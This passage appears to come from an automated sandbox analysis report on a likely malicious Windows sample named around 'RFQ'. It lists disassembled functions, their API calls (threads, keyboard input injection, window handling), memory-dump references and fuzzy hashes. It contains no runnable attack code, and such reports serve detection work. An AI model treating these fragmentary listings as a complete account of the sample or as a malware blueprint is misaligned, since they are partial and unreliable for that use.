                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                          Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 259663610-0
                                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                          Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                          • GetClientRect.USER32(?,?), ref: 00430364
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                          • String ID:
                                                                          • API String ID: 3220332590-0
                                                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                          Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1612042205-0
                                                                          • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                          • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                          Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: >$U$\
                                                                          • API String ID: 2666721431-237099441
                                                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                          Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 2221674350-0
                                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                          Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2037614760-0
                                                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                          Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                                          • String ID:
                                                                          • API String ID: 960795272-0
                                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                          Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                          • String ID:
                                                                          • API String ID: 4189319755-0
                                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                          Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1976402638-0
                                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                          Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                          Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 2487901850-572801152
                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                          Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 1871949834-0
                                                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                          Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                          Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
